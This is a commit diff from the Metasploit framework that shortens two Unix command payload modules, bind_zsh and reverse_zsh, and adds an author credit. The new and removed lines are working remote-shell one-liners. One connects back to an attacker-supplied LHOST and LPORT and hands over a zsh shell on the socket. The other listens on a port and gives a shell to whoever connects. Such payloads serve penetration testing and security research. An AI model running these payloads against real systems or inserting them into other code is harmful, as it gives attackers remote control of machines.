Land #10031, zsh payload improvements

2018-05-16 04:08:56 -05:00 · 2018-05-16 04:08:56 -05:00 · 2f50df7fe7
parent 14ff692d12
commit 2f50df7fe7
2 changed files with 13 additions and 17 deletions
--- a/modules/payloads/singles/cmd/unix/bind_zsh.rb
+++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb
@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'

 module MetasploitModule

-  CachedSize = 112
+  CachedSize = 99

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions
@ -23,7 +23,8 @@ module MetasploitModule
      },
      'Author'        =>
        [
-          'Doug Prostko <dougtko[at]gmail.com>'
+          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
        ],
      'License'       => MSF_LICENSE,
      'Platform'      => 'unix',
@ -44,18 +45,13 @@ module MetasploitModule
  # Constructs the payload
  #
  def generate
-    return super + command_string
+    super + command_string
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
-    cmd = "zmodload zsh/net/tcp;"
-    cmd << "ztcp -l #{datastore['LPORT']};"
-    cmd << "ztcp -a $REPLY;"
-    cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
-    cmd << "ztcp -c"
-    cmd
+    "zsh -c 'zmodload zsh/net/tcp && ztcp -l #{datastore['LPORT']} && ztcp -a $REPLY && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
  end
 end
--- a/modules/payloads/singles/cmd/unix/reverse_zsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb
@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'

 module MetasploitModule

-  CachedSize = 110
+  CachedSize = 94

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions
@ -21,7 +21,11 @@ module MetasploitModule
        Connect back and create a command shell via Zsh.  Note: Although Zsh is often
        available, please be aware it isn't usually installed by default.
      },
-      'Author'      => 'Doug Prostko <dougtko[at]gmail.com>',
+      'Author'      =>
+        [
+          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
+        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'unix',
      'Arch'        => ARCH_CMD,
@ -34,14 +38,10 @@ module MetasploitModule
  end

  def generate
-    return super + command_string
+    super + command_string
  end

  def command_string
-    cmd = "zmodload zsh/net/tcp;"
-    cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
-    cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
-    cmd << "ztcp -c"
-    cmd
+    "zsh -c 'zmodload zsh/net/tcp && ztcp #{datastore['LHOST']} #{datastore['LPORT']} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
  end
 end